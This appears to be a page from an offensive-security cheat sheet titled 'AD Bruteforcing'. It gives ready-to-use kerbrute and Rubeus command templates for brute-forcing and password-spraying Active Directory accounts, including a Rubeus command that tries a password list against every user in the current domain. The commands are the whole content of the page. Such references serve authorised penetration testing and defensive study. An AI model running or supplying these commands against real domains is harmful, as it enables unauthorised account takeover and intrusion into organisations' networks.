AD Bruteforcing
Bruteforcing
kerbrute -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
Check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
Last updated
Was this helpful?